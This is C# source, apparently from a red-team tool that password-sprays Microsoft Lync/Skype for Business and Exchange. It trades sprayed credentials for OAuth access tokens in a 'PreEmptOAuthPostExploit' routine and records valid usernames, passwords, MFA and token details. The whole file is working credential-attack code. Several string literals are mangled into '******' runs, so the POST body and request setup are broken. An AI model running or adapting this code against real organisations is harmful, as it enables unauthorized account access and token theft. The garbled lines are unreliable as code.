public static Boolean PreEmptOAuthPostExploit(CredentialsRecord record, List <ServiceInterface> serviceInterfaces, MainWindow UI, ObservableCollection <Hostnames> enumeratedHostnames)
{
if (record.Token != "" && record.Token != null)
{
return(true);
}
else
{
ServiceInterface serviceInterface = getOrCreateServiceInterface(serviceInterfaces, UI, enumeratedHostnames);
if (serviceInterface != null)
{
//So basically - we need to auth to the REAL SKYPE interface AUTH ENDPOINT - IF it is oauth - and get the token - add it to this record and change the record's service to Skype
//THIS IS THEN ONE ALREADY SET UP - REAL LYNC ETC - SO JUST GO - WITH NEW USERNAME LIST
//Check it is not an NTLM endpoint or such for Skype
if (serviceInterface.host.SprayURL.Url != "" && serviceInterface.host.SprayURL.Url != null)
{
if (serviceInterface.host.SprayURL.Url.Contains("oauthtoken"))
{
//This CAN BE either legacy or modern format - so just go with what we have as known valid
//Only causes issue with legacy here if user is invalid = v slow
string domainUser = record.Username;
UI.ThreadSafeAppendLog("[4]Record username in required format: " + domainUser);
string postData = "grant_type=password&username="******"&password="******"application/x-www-form-urlencoded";
request.UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0";
request.Method = "POST";
var data = Encoding.ASCII.GetBytes(postData);
request.ContentLength = data.Length;
try
{
using (var stream = request.GetRequestStream())
{
stream.Write(data, 0, data.Length);
}
var response = (HttpWebResponse)request.GetResponse();
var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
response.Close();
UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString);
if (responseString.Contains("access_token"))
{
//Add access token to existing record
Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString);
if (accessTokenMatch.Success)
{
string accessToken = accessTokenMatch.Value;
record.Token = accessToken;
record.Service = MicrosoftService.Skype;
UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token.");
return(false);
}
}
}
catch (WebException webException3)
{
HttpWebResponse response = webException3.Response as HttpWebResponse;
try
{
var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString);
if (responseString.Contains("access_token"))
{
Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString);
if (accessTokenMatch.Success)
{
string accessToken = accessTokenMatch.Value;
record.Token = accessToken;
record.Service = MicrosoftService.Skype;
UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token.");
return(false);
}
}
else if (responseString.Contains("Bad Request"))
{
UI.ThreadSafeAppendLog("[1]Valid credentials found - User not SIP enabled or similar: " + record.Username);
return(false);
}
}
catch (Exception esdf)
{
UI.ThreadSafeAppendLog("[1]Exception: " + esdf.ToString());
return(false);
}
}
catch (Exception ex)
{
UI.ThreadSafeAppendLog("[1]Exception: " + ex.ToString());
return(false);
}
}
else
{
UI.ThreadSafeAppendLog("[1]Oauth URL not found for Skype host - perhaps the password spray URL is NTLM authentication or other...");
return(false);
}
}
else
{
UI.ThreadSafeAppendLog("[1]No valid authentication URL...");
return(false);
}
}
else
{
UI.ThreadSafeAppendLog("[1]No valid Skype host for authenticaton...");
return(false);
}
}
return(false);
}
public static void Add(CredentialsRecord record, ObservableCollection <CredentialsRecord> accessTokens, MainWindow UI, MicrosoftService service)
{
try
{
//Will these count as same object? Might have matching properties - but created in two separate places - might need to match on values
App.Current.Dispatcher.Invoke((Action) delegate
{
//Unlock EnumerateUsers for PassSpray - as this is just definitely adding a user
MainWindow.SetDoWeHaveEnumeratedUsers(true);
if (record.Password != "" && record.Password != null)
{
MainWindow.SetDoWeHaveAnyUserAndPass(true);
}
//If record already exists with same username - grab that record and update as necessary
if (accessTokens.Any(p => p.Username == record.Username))
{
int changed = 0;
//SHOULD ONLY BE ONE RECORD WITH MATCHING USERNAME
IEnumerable <CredentialsRecord> alreadyExists = accessTokens.Where(x => x.Username == record.Username);
CredentialsRecord updateMe = alreadyExists.First();
//If the record we are trying to add has a password - get the existing record with matching username
//These are just updating all if record has it - then saving - not actually checking that it doesn't match what's already in
if (record.Password != null && record.Password != "")
{
//JUST UPDATE PASSWORD - EITHER WILL BE SAME OR WE'VE FOUND IT CHANGED NOW
updateMe.Password = record.Password;
changed++;
}
if (record.MFA != null && record.MFA != "")
{
updateMe.MFA = record.MFA;
changed++;
}
if (record.PasswordExpired != null && record.PasswordExpired != "")
{
updateMe.PasswordExpired = record.PasswordExpired;
changed++;
}
if (record.ServerError != null && record.ServerError != "")
{
updateMe.ServerError = record.ServerError;
changed++;
}
if (record.AccountDisabled != null && record.AccountDisabled != "")
{
updateMe.AccountDisabled = record.AccountDisabled;
changed++;
}
if (record.SipEnabled != null && record.SipEnabled != "")
{
updateMe.SipEnabled = record.SipEnabled;
changed++;
}
//UPDATE RECORD TO BE SERVICE WE LAST HIT - IF WE ENUMMED IN EXCHANGE - THEN SPRAYED IN LYNC AND GOT PASSWORD
//IS NOW LYNC
if (updateMe.Service != record.Service)
{
updateMe.Service = record.Service;
changed++;
}
//I don't fully know why this checks for record.password as well? Might have had a reason? Though also - no harm? Can't think how
//I'd get a new token with no password?
if (record.Token != null && record.Password != "")
{
updateMe.Token = record.Token;
changed++;
}
if (changed > 0)
{
UI.saveValidUsersAndCreds(null, SaveType.autoLog);
}
}
else
{
accessTokens.Add(record);
UI.saveValidUsersAndCreds(null, SaveType.autoLog);
}
});
}
catch (Exception e)
{
}
}
